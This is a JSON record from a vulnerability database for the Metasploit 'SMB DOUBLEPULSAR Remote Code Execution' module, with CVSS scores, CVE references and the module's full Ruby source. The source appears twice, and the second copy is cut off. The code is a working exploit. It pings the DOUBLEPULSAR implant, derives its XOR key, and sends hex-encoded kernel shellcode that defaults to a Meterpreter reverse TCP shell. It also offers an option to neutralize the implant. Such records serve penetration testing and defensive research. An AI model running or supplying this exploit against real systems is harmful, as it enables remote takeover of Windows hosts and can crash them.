["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T10:30:13", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-12T10:30:13", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:30:13", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "9c623cbf3b823eb5988a2a0dc385db0d", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant. Practitioner notes drawn from the module source: exploitation only proceeds after the check() ping confirms a live implant and recovers a valid XOR key from the SMB signature; the advanced option DefangedMode defaults to true and must be disabled explicitly, because interacting with a nation-state implant can contaminate forensic evidence; payload execution supports only x64 implants (x86 is rejected), while the Neutralize target carries no arch check; and stability is rated CRASH_OS_DOWN, so a failed kernel-mode exec can take the host down.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-12T22:41:10", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", 
"1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T22:41:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-12T22:41:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 